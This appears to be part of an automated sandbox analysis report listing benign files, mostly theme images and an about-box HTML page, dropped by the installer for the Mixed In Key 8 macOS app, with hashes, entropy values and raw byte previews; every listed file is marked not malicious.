Preview:	.PNG........IHDR...,...,.......Z.....tEXtSoftware.Adobe ImageReadyq.e<...aIDATx..1n.0.E.y..E.N...wiF.!=Q.\... ..6@..H......>..p1,..&i.p^....$..\k..h)..Y....@..?.D.y.x{..M...........bU=b....{;Y.<..lJg.D..~*./..p..}....:...X..k..b..G.....8...f?4.^..!h.0S.5.l.....k.^.-.IA.Z....4$...1S.]E.X.tU..X..k..z..-.1d..X........Z..9.f..\...V.....&....8..x....V....V....Vs...V{D..0...a}J...J..3..p.{K.%..5.....;s..U..\|..........]...s.T....+....IEND.B`.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/.BC.T_Flvebx Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	622
Entropy (8bit):	7.404463141396479
Encrypted:	false
SSDEEP:	12:6v/7vr1sMuHvjloYIrGzC5F9A+kUUJhzb3CjXPMwdoS1U4TgcmTPW:O10blo/yzw9AQ4IeSgTPW
MD5:	BBDC220AEA5CAD4E2FF300D0E519B088
SHA1:	4FFB02B3788FED06697141332B78132108276A5C
SHA-256:	8C61AF9BC4290727DC65B052B3149F10392B2A202C3B9B33F9937EF4945FB228
SHA-512:	03710D41B9056FA6FBFEB0A8756F9470A32959CAA80A9DA10C2C9C8C833AD5128570E30FF2F9F1EE830A0A5C2BDB7A746C985ED85910EC08925BABC4A5E3B3B6
Malicious:	false
Preview:	.PNG........IHDR...$...$.............tEXtSoftware.Adobe ImageReadyq.e<....IDATx...m.0.@M....L@:....t.`.....(.....H' ..L.P[.T.u...+H=........h>...I...".+.......I".....-.c$..z...W......`....F..J.d!..1...r.1....W.#..%..<;k....k_....`.......9c.........C........g..%..F5a..].B...P.W...cBW....e#.H .......D.q@K...#....mY.....$.}."..v..S?Dx.......%":...>@.25...#@.m@.R.!.......J..P.s..?@X..t]A..$...rb.......G..#.......]..)b.&....a....m...C..#....s..%,.s..%.m-.u)R%..j(t...kk.~..H(.E.l..=.-.J../b....'H..e.P#..6...=%fS...}./.....m.1.......0R:..<..+.....jh ..x.P.JY;R.#../....e,.....IEND.B`.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/.BC.T_M093FI Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	TIFF image data, big-endian, direntries=20, height=176, bps=1, compression=LZW, PhotometricIntepretation=RGB, description=mik-top-right@2x.png, orientation=upper-left, width=918
Category:	dropped
Size (bytes):	108888
Entropy (8bit):	7.9579195875467565
Encrypted:	false
SSDEEP:	3072:mtLKyyHxTeNaCNDkbGjfb8918GftXRPj/qv7mqQ5+Uu2GK:iedH05NpP88ap9EQ9
MD5:	3E2796C3A8DFE433D22DB7CC414E1EF5
SHA1:	DF83591755ABFD478A81F95C2942AE689B2ECE68
SHA-256:	DA74013E33AE2387D36F1723714FB85FDACEBD7F46E61579D8C7CA993295547F
SHA-512:	B6BFDA7FC5B30798416454759C3ACB7C519E5D17DAB91A18AE925A6B422ECAF7AFD537E36F78575D41D537B340708A5C8D1A56E72B761A8E033127881DE75B7A
Malicious:	false
Preview:	MM...^..? @.$....BaP.d6...DbP......FcQ.K...{..h.rM...%2yd"W...ar...36.Mg0Y...8....)U.v.............t..V.A.?..w...W... H.J.=.X#..T.m=..a..l..r.^oQK,..{.`o.g..p.`qP.N.Q~.`...]....A. P....>....E...3L.[...v8....D.Y%Q.....}>..H..........@...v/..../......~.^.H......>.......r=.n.y..C..~.......,..H.T.)(... 0.....$..'y.~)M.N.7K.J.....:.+,.@IdI..1J.....T......1....Bq."...3../.l\|..1..;..........@ ...@...........J{L.....tn..rt^.r:...:.4..#....H.>...............Tl..NS4..:Sd.<E......"..G......."...O..TN.SO.cNMR.&.V..h....=X.J..(.su\..heYd.. .EMu...A/...@.!.....oYO.B..g..SX.... ..i.h .T..e.iX.k........h..I%...."X...[.D.....x....q...M...XRn..2;.........R....hE...R.....]a......Q..V...dK...f.ZP\|.@.J..@......J.....c.C]Mi...J.y&..s.;.i...M./..w....V.{\|T.h\.U^a2.I.S.o..p...0....7i^..Wn..)..{,. {="...)jr.?@.0w..\|c._..,Wz!.3.-.......K.~6]J'a0.w...._7...#.`.R.*.I.SG'...U-...kz_.x..w../C..%.^..Wo~...\|."hb.M...". +........Y..b.(....>...u.....IV.eU......Y=d.....

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/.BC.T_NWovmi Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 10 x 40, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2841
Entropy (8bit):	7.910899373244266
Encrypted:	false
SSDEEP:	48:BCt7H34gNMRwEbM20gzNXVYnl7L3+zLpN8T30gNBDMSsvu/6vnP:BCt7IIMRfwnXz+npN8IgXBsvuS/P
MD5:	1088016EB173212F3BBE06D89F636997
SHA1:	5AA13897E238C86B8DA6F30BCE9FE25555CCA457
SHA-256:	1130C6D18D21AD293AC39F62085D43DF312562BD573CA3ABD62FA80F8FE989BB
SHA-512:	6D487515B505C38DBF850F0ED23B730D62043C73FCC34BA7C97E048BDBFE4FAD682727528BD3E2BCB9A672480ABA6A37375DC8493E89D51F862C3D256BBA3F4D
Malicious:	false
Preview:	.PNG........IHDR.......(.....H4.....CiCCPICC Profile..x...wTSY...{/...B..z.MJ...z.^E%$.B....WD.W..i."."....Y+.XX.../."......e_..e........;s....<.(..BQ&..@.H"...`...1....D....py.YA.....?/.3.u..L...u......a2?.......K.B..\|A6..<..s%Y2.$...4.......QV.q..6....d....Q.Y.Y....;P.#.......#..\|.e.ti...7(.3..l.0..]".l.2E...Ay...J.,N....24O.8.Y.......g.vtd3}.........q.\|&'3#.+Z...;.....L......,...._._..z.;.z...e..A..o.o..l.........fK,..e......... ..@.Y.a..%E".r.......x...~......a.y.....)H.J.%LYQy..R13;...0Y..bt...8+.Yy.....b..=..2.(.m../..3EL..:...f. ./s....#./...7.....`hd...GW..}.$F......2.(.....\.~...d.....`.....oB.........-............... ....R@...\.........{@9..5..4........ep...}.>..#........Ax... 5H.2.. ......@(.....dH.I.U.F.....P..#t...].z....4.........aM.....;..G...dx).....p5\|.n./...>x.~.O!.!#.D.a!l...#qH."F. .H.R.4 mH'r..D&......abX.g./&...,..l.c.`.1..[.!.$.#.....a..~..l26...-..b....}...k.......p..X\*n%n.n...w....M..x5........%.\|\|.......?..C ...6.oB.AD.@

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/.BC.T_O7Wo58 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 40 x 76, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	4309
Entropy (8bit):	7.883168293204685
Encrypted:	false
SSDEEP:	96:9Zka8VKV5VBMGTZRa6gZkjLcN78JPF3AJCfqcb03t07TJnQI:9Zk9VKV5VBkKIN76A4l7vdT
MD5:	66663506FF52DA921ED0EB28001D850E
SHA1:	2374E3A7DA1066BE2940B3BB907DD1BC81C5C45D
SHA-256:	58A735B284502F6215EF20EE522CA94253EB46608A89BF6E5FB14D93B1A933BC
SHA-512:	B1B6FA35C18140ACA4C90FF7E7FEA390A8DE86B1B3777409B6187982BA9DD94EE6115A0E4C9A3FE75CD018CB815400C4C6DDB577211F8B1B07B77CD16E0E2F56
Malicious:	false
Preview:	.PNG........IHDR...(...L........!....iCCPICC Profile..H....TSY...{/..B..z........PB.1!...Q.. "...C..G..X.Ql..R..dPQ.....}..vv....\|........n.=....\c.x.....L~...=&6......Q..P`..<...@.j..W}.D..c2S....WI...,..P....V..g.8...3.@.h^+;.7.[Q....\9..\|r..f....0O... P.L~2....<=....`P6.9\..Qva.0.y(.=`...b......Ou..R3A\..L.......#.3W........C..J../lf>t...V......2...lO3.".c..3n..L..9..E..1.?.,'..1...a.....@q.D......s...a.qnJD..gq...X...0?.S.....='.}..!....+3%.o...q?.D/oq..)...........+......f..l.S....uB...8 .0.+31gf_....U\|NrJ&..=%.t..ejL.4...`........%H.0.....Q.Mr.s...h.....\|N;..G.8....fs3[.`..H.Y......&....'....?... .,.,..2..d.<...."........u..8.Z.9p.\.7A/........`.\|.S...!*D.. uH.2.,!{.....0(....!.$..MP.T..C..z...,t....A...h.z.}........l....p.../...p......j.8.._.o....~.O".!#..b..#.H...$!\|d-R..".H#.t#w.......ah.:.....DbX......rL........L`.c.X........`.....l)........a?.p8y.......V.....p..>.(n...+.....<.../....._......d.:...C.#p.....c...~.3..Q..Ct$....U...v.m

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/.BC.T_R5ZNvk Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 5 x 40, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2845
Entropy (8bit):	7.908364260501814
Encrypted:	false
SSDEEP:	48:eCt7H34gNMRwEbM20gzNXVYnl7L3+zLpN8T30gNBDMSsvu/6KB:eCt7IIMRfwnXz+npN8IgXBsvuSKB
MD5:	E909F95EBF82FDF40D95E5C5B732B3A7
SHA1:	7DA7FD7DB57D3200BD4AE30B11B020DFDF89318C
SHA-256:	F4A59C69FC547BC9AB11CE89759398BDC5A56CE72973CA0D0B746A4569BBB916
SHA-512:	3E6A2C9806D97B1162DBBAAD515FE44997635A25F941D5618BCAE0A484929D268894699900A9CDB16CD8BE743B5D3209EC37EC09CCA22C908CEC93300110469D
Malicious:	false
Preview:	.PNG........IHDR.......(......?.Z...CiCCPICC Profile..x...wTSY...{/...B..z.MJ...z.^E%$.B....WD.W..i."."....Y+.XX.../."......e_..e........;s....<.(..BQ&..@.H"...`...1....D....py.YA.....?/.3.u..L...u......a2?.......K.B..\|A6..<..s%Y2.$...4.......QV.q..6....d....Q.Y.Y....;P.#.......#..\|.e.ti...7(.3..l.0..]".l.2E...Ay...J.,N....24O.8.Y.......g.vtd3}.........q.\|&'3#.+Z...;.....L......,...._._..z.;.z...e..A..o.o..l.........fK,..e......... ..@.Y.a..%E".r.......x...~......a.y.....)H.J.%LYQy..R13;...0Y..bt...8+.Yy.....b..=..2.(.m../..3EL..:...f. ./s....#./...7.....`hd...GW..}.$F......2.(.....\.~...d.....`.....oB.........-............... ....R@...\.........{@9..5..4........ep...}.>..#........Ax... 5H.2.. ......@(.....dH.I.U.F.....P..#t...].z....4.........aM.....;..G...dx).....p5\|.n./...>x.~.O!.!#.D.a!l...#qH."F. .H.R.4 mH'r..D&......abX.g./&...,..l.c.`.1..[.!.$.#.....a..~..l26...-..b....}...k.......p..X\*n%n.n...w....M..x5........%.\|\|.......?..C ...6.oB.AD.@

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/.BC.T_UdMXyE Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 44 x 44, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1311
Entropy (8bit):	7.841926633046951
Encrypted:	false
SSDEEP:	24:L0+pKgHFPsECxN+RTdG/KbxD2cjo2e+zWgfXuz3ZQZv6b9LxR/e47TStq+:VKECxN4pG/K/e+zWgQQRO9LX2KTSQ+
MD5:	CAA146DCFBE758CC18AFB3600925697F
SHA1:	CFC5A002A0359814B0D96DFDE16478A3221140C7
SHA-256:	4639521D24D05DCFA67D8225D336285F0A822F968E7FDC779D32CFDEA8B22B5A
SHA-512:	009448ECDC4D7770A9EEB52A2B6B2B1E3776B4ABD58EEBA3AC46DA9D3C9A3602699805C7B03488B26A3F710E627C660050AA56AE2764A6D20F37E4AC2A95EF00
Malicious:	false
Preview:	.PNG........IHDR...,...,.......Z.....iCCPICC Profile..x..T.k.A..6n..".Zk..x."IY.hE.6..bk....E.d3I.n6..&.......E.....z.d/J.ZE(.(b..-..nL.....~..7.}ov...r.4......R..il\|Bj......A4%U..N$.A.s.{..z..[V.{.w.w.......@.G.....q.Y...<.).t......9Nyx...+=.Y"\|@5-..M.S.%.@.H8..qR>......inf....O.....b..N......~N..>.!....?F......?.a...=..5..`.....5.._.M'.Tq.....V.J.p.8.da.sZHO.Ln....}&....wVQ.y..g....E...0.......HP.E.a..P@.<.14.r?#....{2u$j.tbD.A{6.=.Q..<.("q.C....A...O.y..\..V........;........sM^\|..v.WG..yz....?.W.1.5..s...-_..)....U..K.uZ17.l.;=......s...7V..g.jH....U.O^...g..c.)1&v..!......K...`m.....).m..$.``.../]?[x.F...Q....T....d4...o..........(./l...mSq...e.ns.....}.nk.~8..X<...R5. ...v.z..)....9R.,.....bR.P.CRR.%.eK...Ub.v...n..9B..Je........R...R.~N....o...E.x......IDATX...KN.0..P.#.@.X.f.7...]r.8..#9.+V,...z.0.p.c...X....e2q....Z...a..%.......a..pl`..........dD.o...<M.3>H..^)u.`.{5)..v.....@.....;j....=......y.`.>.LS`.m......s.).-pJ?......s...1....

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/.BC.T_W3AyFq Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 36 x 32, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	467
Entropy (8bit):	7.235944718437383
Encrypted:	false
SSDEEP:	6:6v/lhP1WnDs54Jph3OLm2ywcaJDHliR+k6dIzJTf8FX8+qXQ1qPUg2bFtJvoac7A:6v/7bUl2ywP9l4+ZWT8FKULgarcIlRr7
MD5:	EB4700EF433EE10C93AF199A79EC04A3
SHA1:	6D63C4F6A151DEAB58263A21DAB49E59A9CBEFE6
SHA-256:	1A3DDF0E0FF89A465CBEBA1C0A95B76E91CC097872E9B381365BB8639EC070D7
SHA-512:	BC56E7BD9C057068F049BBC914931C4B0AA9F02DA46C8A27AA5F9B51DD64E4E3BC3BCDD38F45A14FFE127E28171D15A399CEC79F9D3DCC8E2F5AE71AA2324037
Malicious:	false
Preview:	.PNG........IHDR...$... .....z......tEXtSoftware.Adobe ImageReadyq.e<...uIDATx.btqqa ....D .D.{..;.x..'.P&2.X..V ^.......h >.....T.Y.p.Q".BC..!.E.zSh...A.dDq.....@e.9.....`s.;2..GK..%.A.i. .2.d=.B..i..`s.N2..AK....7$.JK..V/......Z..g../.j..=...O....jO..A.@....t.B.l...c........)....P'...F@.+...T.......Xb....h......R..%...$..c$..K.fl%Tl0.H'y........@...u.?.GU.9....C.O.vih.....y..4..t...q...Z.m&P.....k..1.].~....Q.... .A. !..D.r7h.9. ..aT<5v.[.....IEND.B`.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/.BC.T_az0bMk Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 36 x 32, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	441
Entropy (8bit):	7.335516391981174
Encrypted:	false
SSDEEP:	6:6v/lhP1WnDsjlIEOMnuiZKbRuaygtOOM9CL7HjL2o9Rees/RktIp3igL/35EpA/7:6v/7bjlIMn2R1L86LTO1UtIrz35mA7
MD5:	5AE62011E18E6128AD7BBEB645AA8B7D
SHA1:	2AE91233D93E73601221CD8270B5512BD5F6F558
SHA-256:	EC4AC790718CB25D3D55193A2ACFA791D153639C815876057FE912FD865499CA
SHA-512:	8C5E7D926DA9AAFC7573152FEA992030852110A65558B4F56A66C47950ADF58A305766BAFD383CB2B738583757F38AA2B91321EB45FC4AA8F7C7F1D8B5F36996
Malicious:	false
Preview:	.PNG........IHDR...$... .....z......tEXtSoftware.Adobe ImageReadyq.e<...[IDATx..MJ.A..G'G......... z.!kA..........Q.9.......L.*..]...K...dQ..R.=.U.Ha..&.Y#....y-.:.\..%;...U.:.....-f.......]f..!)x.@....:^%s.k.97C.........mn..uS.s.C...]...4t.F...m...Cv~.....c...H...2.....6...L.);.5.....!..........U...f...A.x..{.L..g..[&.Y.e.K.>").B.Q..H..]...2....Ku...w...:....h.5t"./..<=C{.S=e....5CC.X.....2...2w..0...)J........IEND.B`.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/.BC.T_hzwkRV Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	TIFF image data, big-endian, direntries=24, height=340, bps=0, compression=LZW, PhotometricIntepretation=RGB, description=analysis-message@2x.png, orientation=upper-left, width=400
Category:	dropped
Size (bytes):	85030
Entropy (8bit):	7.946426330164176
Encrypted:	false
SSDEEP:	1536:ebN0fHk2hxGgRWIRJmmR9hAPYowTNgtJL3T7RUQfMy/JIIDbZUpW4K:EKfHrzGgRWIRwmR9O1wqtc8/JI6IK
MD5:	2AA6E3DEF55FAF02590EC9A5DA3B350B
SHA1:	135A47BC355470CDBE99FEBEE0E9FCAB5B6ABA7A
SHA-256:	12A1DB8E5286C1E54042AE5E407CB8EEE53B522190C01123F2885896E164CFFA
SHA-512:	9963A9DDDD9C21C2A0C629102467E431D8708A418F93AEEA6F06F4D022740EF5E0060622656A999261A014170623CB65936631BAF4FA2050144F035B8150780E
Malicious:	false
Preview:	MM....R.............>...................................T....2016:08:11 00:18:09..?.@.$....BaP.d6...DbQ8.V-..FcQ..v=..HdR9$.M'.JeR.d.]/.LfS9..m7.Ng@...w?.PhT:%..G.RiT.e6.O.TjU:..{U.VkU..v._.XlV;%..g.A.. ...o.K.n..\|.......<..07h%.z....\T.{.c`.......j.....~...9..G......[T'C..@..P......v..~3'..b.\|.+A...z\...g2...'....o{-......:....G..v5w...y...0.;..[..o.....t..S..2..2.S...........O.E..Os:.9....C..........s\|.6/4E.<p..71{....2.`:.....!....#!.\|.%...u..s..0.B...N$x.R....0...Nd..8.....S$3..pd^.Ds..1@p.A-M.t..M.4...$]+O/#.......Gn\5.....S...K.t.%D...7G.e4.J...G.k...n.....2..6.q.......{9..+.4....d1...b.q5{,.O..5....W-..GUYmmih...2.... .m.Phe...}.w.g.B.....M.......Y..v.1q.B.R6m..O..!z.05..U3.0.`L$..5.Ee<:-..1.69.b7..7./<uO72...V.N%.<....`u.1.Y1M.m8o.v.........h..4.fr<..x........tn.xP.MD........~.....!.q..c........I/.....;...a!....my...ER.)B.\|.V..v5..X.....$.he....,...g....r...V=u.....C...e..W..V.oo...<C..~/)%M.....Z...{~.5*`..e+..]...\|.^......

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/.BC.T_l6TwN1 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 30 x 40, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2813
Entropy (8bit):	7.909683961433022
Encrypted:	false
SSDEEP:	48:PCt7H34gNMRwEbM20gzNXVYnl7L3+zLpN8T30gNBDMSsvu/65p:PCt7IIMRfwnXz+npN8IgXBsvuSX
MD5:	21D7C4DD99961496E8F8F52F3D242619
SHA1:	55108EB8E48FAE7AAFE7DCF44FF28DD946396053
SHA-256:	7EC92ED78741EDD37CA1309F0434FFD074424A340C42472B8541552E7F474B74
SHA-512:	F13E6BF6F358894531BFF5884FFCB1C0ADB933011560C9C7014DACC8E3FCC4F766F513B16245BD2D47AFE9E8BA737C5CD9B68DF973D26A431EB44B141E1DA44B
Malicious:	false
Preview:	.PNG........IHDR.......(.....fq.E...CiCCPICC Profile..x...wTSY...{/...B..z.MJ...z.^E%$.B....WD.W..i."."....Y+.XX.../."......e_..e........;s....<.(..BQ&..@.H"...`...1....D....py.YA.....?/.3.u..L...u......a2?.......K.B..\|A6..<..s%Y2.$...4.......QV.q..6....d....Q.Y.Y....;P.#.......#..\|.e.ti...7(.3..l.0..]".l.2E...Ay...J.,N....24O.8.Y.......g.vtd3}.........q.\|&'3#.+Z...;.....L......,...._._..z.;.z...e..A..o.o..l.........fK,..e......... ..@.Y.a..%E".r.......x...~......a.y.....)H.J.%LYQy..R13;...0Y..bt...8+.Yy.....b..=..2.(.m../..3EL..:...f. ./s....#./...7.....`hd...GW..}.$F......2.(.....\.~...d.....`.....oB.........-............... ....R@...\.........{@9..5..4........ep...}.>..#........Ax... 5H.2.. ......@(.....dH.I.U.F.....P..#t...].z....4.........aM.....;..G...dx).....p5\|.n./...>x.~.O!.!#.D.a!l...#qH."F. .H.R.4 mH'r..D&......abX.g./&...,..l.c.`.1..[.!.$.#.....a..~..l26...-..b....}...k.......p..X\*n%n.n...w....M..x5........%.\|\|.......?..C ...6.oB.AD.@

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/.BC.T_ngmBiM Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	TIFF image data, big-endian, direntries=21, height=104, bps=0, compression=LZW, PhotometricIntepretation=RGB, description=mik-top-left@2x.png, orientation=upper-left, width=275
Category:	dropped
Size (bytes):	43612
Entropy (8bit):	7.686593151643444
Encrypted:	false
SSDEEP:	768:xYz/g+T9yD7nU6j7QfLzfo9Devi+9VMj9X/eiYyE2/Rch/E1XZlHwaWyYyu:Ob74ZfQfPoIqc6XpxJchM1XZlQoK
MD5:	90BE9B3CDB26E7911F80D71718F3245F
SHA1:	A0232E3978B9478316533A0FA46C631ACEC222EF
SHA-256:	F949FA512A0A2EF1B81A080977EBF6453EDCD59048F5EF2E2ABBBAE346AEAF81
SHA-512:	B54E57081CC0A2F6AB58A96D05926CC03D0F6428CAA2014ACCB57236A310F87ED797699A2E05DD546E6D656EB8FB07EBC3F541228B1D579D86E75F2E4AB31446
Malicious:	false
Preview:	MM...]2.. P8$....BaP.d6...DbQ8P....;...........`.....@`@..N...@@......?.o(...?{._......... P.)..@._.J.V.W.VkU..v._.XlV;%..g.ZmV.e..o...,.+...&...y8.T........(....2. .L......L..#.I....^.#.?........>.`'...:}?./.....z9..GS3f.e....Px..T...g7...tz]>.W...v{Gv`<&.....0Y)....@ `@FL....-x.9...>..._...d....~......I.>.p[/.$pp.\|5...{(..8....y....z.......X.....&%5..m....u...}.... ....@........ .........; ..`....mx..@.\%..2....s...Jg...A.....pl....,......'.8..).u....s.Lq.Y6`!dt..Q.!S..5M..=O........}.$.............>.\............KpK..X(..@...e.....B.]..N.(.: .e.; S...$g.....o....X.l!83..Yv@...E{....}........ G....A..\WU..+.....Y..._Y.f5db/.;[3...2..]...i.v...$s...[h-.8.g.J.\U..K..i.q....M. @.L.$..u_........W....bh..C..I....b..ib...eX..j......ds.e.?......[..V...A.&j..S...s..:g.<.<.o.N...}...}.......V....o]....e....3.G....;\...}..=.......NO.3...A...T.^O.M...y.k=..w..._.[.._.}(.6.....t.W.....u..y......P..@R..C.....~..<?JH#..4.<Uj..bh.i...f........1...b...1+.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/.BC.T_pxS9uz Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 56 x 56, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	869
Entropy (8bit):	7.658809722807515
Encrypted:	false
SSDEEP:	12:6v/7K/sOKDRUAZrYWm2bv0F1FQcyafv0DEr55WEh32ZPzOVa0smETkzwJzzN:T4Sc/mJF1FQgv0Du3oPzeFgEwJt
MD5:	4C804C93213D0FBC2FCA2D7590B63EAE
SHA1:	9507D931B84229F9673975F037B133CFC54F441A
SHA-256:	50C5EF8B2A85900DE0959F2527C3F84CA1EA068DBA98CB44ADF3C3DB5417DB18
SHA-512:	D3A4209DB3AD64778A4D4F82609452777F6A0AFB475B820B256FA47B83448B4673123C711172B0C7D8ACC51E6EFB854D34E659B3B22AB3B5094F736E01D35864
Malicious:	false
Preview:	.PNG........IHDR...8...8.......;.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..[.U.0.5y..6.m...f...............&H:Ar.4L.n.lPx.$.lKI.C...Kl.[..-..m[A,.R.tf<..Bi.tg<....@.d.t..!..n..I.j....-.....}?L....M...l....x]\|P...TL+..{..b.J........JL..YP.LFlf....J...P.........P....jI.&T...&....4).....k<..>...x...6.......m.@...p...$.~S..I.M......n........9A4.aZ.K2..e.yT.....`'B%.].`..~........,..e..Iu..qy.0WpO...5..\.:4.&.. .yv;....o.....>..C....XjH.\..;.....~Q.tM...{.1.^..&...D......E.H.Od....p.9..-c..=`.5....dK..g.p7.{.f.7..Qr..r.`a.......K6..`1.......q...K..^........J.>......0=.5.z....a....a..;0..ab="{.FzVA2p..tm...}q......^....1..b...SO]/..Z.i.G.%.b.@...d...M.._6.+(..6>......l...Nu.......A..rIa..........^.g.}..\|...s.[.x..m.sA_.....t.a...F....Y.U.L.]J8G...L.{.I}.+..PW..G..8qu....*.t9......VCl9(..b.....N.....g......~.t&Q.....IEND.B`.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/aboutbox/.BC.T_GyJvy6 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	HTML document, UTF-8 Unicode text
Category:	dropped
Size (bytes):	3015
Entropy (8bit):	5.362206122271343
Encrypted:	false
SSDEEP:	48:GTpx2NXpjDLMzIMvsvckBwBsMcfkO9ZwfnKnNgAVslPkNHaoRrFJW:a2X4Cv9BldfkOQfnKnNNVbHaErFc
MD5:	47DF574B4DDBE9244AFEF234B763EAD4
SHA1:	268CD4046D013CB7812D127202E906B82EF30C0A
SHA-256:	D568880AF7357E07AF8F5DD80F7BBEED5DECEAC6AAB2C8C1306BA04CC129C348
SHA-512:	D30D1F11EEB0C1E4AEB643A0513B8C4DB2E433917FDD35F0B79FE381CDA26BD4A58D90451717A48DC2A588DCBA2C537F7A7796448669DE6419E76B380A3D65A7
Malicious:	false
Preview:	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN".."http://www.w3.org/TR/html4/strict.dtd">.<html>.<head>..<meta http-equiv="Content-type" content="text/html; charset=utf-8">..<title>About</title>..<style type="text/css" media="all">...body {....margin:0;....color:black; background:white;...}......table.grid {....margin:20px 0 0 90px;....font:14px "Roboto", sans-serif;....color:#00204E;...}...td { padding:3px; line-height:19px; }...td.left {....width:45%;....vertical-align:top;...}.....div.button {....position: absolute;....right:30px; bottom: 30px;....font:14px "Roboto-Medium";....-webkit-user-select: none;....padding: 5px 18px 7px 12px;....color: white; background: #04B7FF;....border-radius: 5px;....box-shadow: 0 6px 13px 0 rgba(0,127,178,0.20);....cursor: pointer;...}...div.button:active {....background: #00A7EF; darkens -->...}...div.button span.icon {....padding: 7px 6px 9px 6px;....vertical-align: bottom;....font:19px "MaterialIcons-Regular";...}.....#icon {....float:left;..

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/aboutbox/.BC.T_k6hgti Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.393672171921907
Encrypted:	false
SSDEEP:	6:TMVBd/4o+tJCc4EyfdUdBRECcgVvkLuSlpQcri:TMHdgo+tJVEdQiCXFkXhW
MD5:	45B67BC02536D1969A3FEBF40AF61C72
SHA1:	B14CD58D80C8C271E70E0D35B379A5F7CA2CBCF6
SHA-256:	F712FE6BC14B3001DECB3E5CCF1C4E832BC2F253D2F660E4E1D29FF71A53A737
